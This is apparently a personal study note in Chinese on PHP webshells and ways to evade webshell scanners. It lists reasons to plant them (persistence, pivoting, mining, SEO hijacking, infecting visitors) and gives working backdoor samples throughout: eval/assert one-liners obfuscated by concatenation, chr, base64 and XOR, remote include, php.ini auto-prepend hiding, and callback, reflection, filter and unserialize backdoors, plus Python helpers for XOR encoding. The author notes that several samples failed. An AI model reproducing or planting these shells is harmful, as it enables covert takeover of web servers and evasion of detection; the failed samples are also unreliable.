初识webshell及免杀基础

初识Webshell：

上传Webshell的目的：

1.权限维持，方便下次连接控制系统
2.权限提升，利用某些漏洞将权限提升至管理员权限
3.做跳板机--探测，攻击内网其他服务器
4.备份下载数据库文件或者其他重要文件
5.DDoS攻击--黑灰产DDoS攻击需求高
6.挖矿--例如利用JS挖掘门罗币
7.黑帽SEO ,流量劫持；提升在搜索引擎的排名
8.网页挂马--攻击访问者
9.充当代理服务器

上传WebShell的利用途径：

1. 登陆管理后台
2. 文件上传
3. 代码执行&命令执行
4. Web服务器文件解析漏洞
5. SQL注入
6. 文件包含
7. 未授权访问
8. 弱口令&暴力破解

WebShell变形技术——绕过检测：

1. 关键字混淆
2. 外调恶意代码
3. 配置文件隐藏
4. 文件包含
5. 正则函数
6. 回调函数
7. 注释类后们
8. 反射函数
9. 过滤器函数后门
10. 反序列化

最简单明了的webshell：

# shell.php
<?php @eval($_POST['cmd']);?>

关键字混淆——拼接：

拼接：将一些关键函数拆分，然后拼接，使得WebShlel检测系统无法匹配到关键字

# shell2.php
<?php
$a='a';
$b='ert';
$c=$a.'ss'.$b;  //assert
$c($_GET['cmd']);
?>

# shell3.php
<?php
@$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';
@$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';
@$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}
[/*-/*-*/123/*-/*-*/]);
?>

# shell4.php
<?php
$a='chr';
$b=$a(97).$a(115).$a(115).$a(101).$a(114).$a(116);  //assert
$b($_POST['test']);
?>

关键字混淆——加解密：

加解密：将关键代码加密后解密，能逃避一些没解密还原或还原程度不够的WebShell检测系统

# shell5.php
<?php
$a=base64_decode('YXNzZXJ0');//assert
$b=base64_decode('X0dFVA==');//_GET
$a(${$b}['test']);
?>

关键字混淆——异或类生成新字符：

异或类生成新字符：生成新字符，逃避检测系统对关键字的检测

# shell6.php
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"<0x06>").($_[+""]|"D").($_[+""]^"<0x15>"); //GET
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

# shell7.php
<?php
@$_++;  // $_ = 1
$__=("#"^"|");  // $__ = POST
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"^"/");
@eval(${$__}[!$_]); //PASS:0
?>

php我没系统学过，这里没看懂，以后有机会学php的话再来解释，先记录下来。
2021/3/18-补充：

#!/usr/bin/python
# -*- coding: utf-8 -*-
a= '#./|{'
b= '|~`//'
result_list = []
count = 0
if len(a)>len(b):
    for line in b:
        c=ord(a[count])
        d=ord(line)
        result = chr(c^d)
        print(result)
        result_list.append(result)
        count += 1
else:
    for line in a:
        c=ord(b[count])
        d=ord(line)
        result = chr(c^d)
        print(result)
        result_list.append(result)
        count += 1
decode_result = ''
for key in result_list:
    decode_result += key
print(decode_result)

#!/usr/bin/python
# -*- coding: utf-8 -*-

a= '`~·!@#$%^&*()_+{}[];\':|\"\\,./<>?/*-123456789asdfghjklqwertyuiopzxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM'
b= '`~·!@#$%^&*()_+{}[];\':|\"\\,./<>?/*-123456789asdfghjklqwertyuiopzxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM'
result_list = []
count = 0
for a_line in a:
    for b_line in b:
        if chr(ord(a_line)^ord(b_line))=='e':
            print("e: " + a_line + '\t' + b_line)
        elif chr(ord(a_line)^ord(b_line))=='v':
            print("v: " + a_line + '\t' + b_line)
        elif chr(ord(a_line)^ord(b_line))=='a':
            print("a: " + a_line + '\t' + b_line)
        elif chr(ord(a_line)^ord(b_line))=='l':
            print("l: " + a_line + '\t' + b_line)

D盾查杀测试：

2.外调恶意代码：

将真正的恶意代码隐藏在本地的一些图片，附件类文件里，或者使用远程下载的方式来逃避WebShell检测系统的识别
涉及的一些函数：file_get_contents，curl，include，require，file等

# test.php
<?php
$a = $_GET['file'];
@include($a);
?>

上传图片马(做好隐藏），然后通过include包含解析

如果想将恶意代码隐藏在其他服务器，我们使用HTTP，FTP去下载，不过前提是在php的配置文件php.ini中满足以下：

allow_url_fopen = On
allow_url_include = On

3.配置文件隐藏:

我们可以隐藏的配置文件如php.ini, .user.ini，.htaccess,下面以php.ini为例，在其配置文件中：

auto_prepend_file=“/file.php/” 相当于在php脚本头部include
auto_append_file=“/file.php/” 相当于在php脚本底部include

注:auto_prepend_file 与 auto_append_file 只能require一个php文件，但这个php文件内可以require多个其他的php文件。

4.文件包含：

通过包含文件来执行后门，这里介绍通过php流来达到后门文件的效果。
文件包含函数：Include,include_once,requiue ,require_once

这里利用之前提到的一个后门文件：

# test2.php
<?php @include($_GET['file']);?>

这里复现失败了，应该是环境原因，先放着。

正则函数：

使用正则函数preg_replace当作后门，能有效的混淆Web管理员和一些检测系统的查杀

# test3.php
<?php
$a=preg_replace("/d/","ss","adert");
$b=$_GET['cmd'];
$a($b)
?>

回调函数：

回调函数类后门是一个比较隐藏的后门类型，正是由于其不多见，一些WebShell的检测系统不会很严格的去检测这些函数。

可以做回调后门的一些函数：
call_user_func，call_user_func_array，array_filter，array_map，array_reduce，array_udiff，array_walk，array_walk_recursive

# test4.php
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
?>

原理：array_filter() 函数把输入数组中的每个键值传给回调函数。如果回调函数返回 true，则把输入数组中的当前键值返回给结果数组
"YXNzZXJ0"经过base64解码后为"assert"，回调函数为assert，参数pass传输的数据会直接传给assert函数执行。

详情请参考：php回调后门,php过WAF一句话,php最新一句话,php过狗一句话

注释类后门：

一些WebShell的检测可能会忽略注释，而我们正好可以利用这一点

# test5.php
<?php
/**
* eval($_GET[m]);
*/

class Test { }
$rc = new ReflectionClass('Test'); //建立反射类的一个对象
$comment = $rc->getDocComment(); //执行反射类的一个成员函数，获取完整的注释。

$pos1 = strpos($comment,'eval'); //标记eval开始的位置
$pos2 = strpos($comment,';'); //标记结束的位置
$len = $pos2 - $pos1 + 1; //获取语句长度
$cmd = substr($comment,$pos1,$len); //按长度截取字符串

eval($cmd);
?>

有点问题

反射函数：

通过反射函数构造WebShell

# test6.php
<?php
$func = new ReflectionFunction("system");
echo $func->invokeArgs(array("$_GET[c]"));
?>

过滤器后门：

FILTER_CALLBACK 过滤器隐藏我们的后门文件

# test7.php
<?php
filter_var($_REQUEST['op'],FILTER_CALLBACK,array('options' => 'assert'));
?>

反序列化后门：

通过php的序列化和反序列化，我们也能制作一个WebShell后门

# test8.php
<?php
class A{
    var $test = 'demo';
    function __destruct(){
        @eval($this->test);
    }
}
$test = $_POST['test'];
$len = strlen($test)+1;
$pp = "0:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}";
$test_unser = unserialize($pp);

有点问题

D盾查杀检测：

总结一下，不懂php感觉没啥收获，有点后悔记录这篇文章了。。。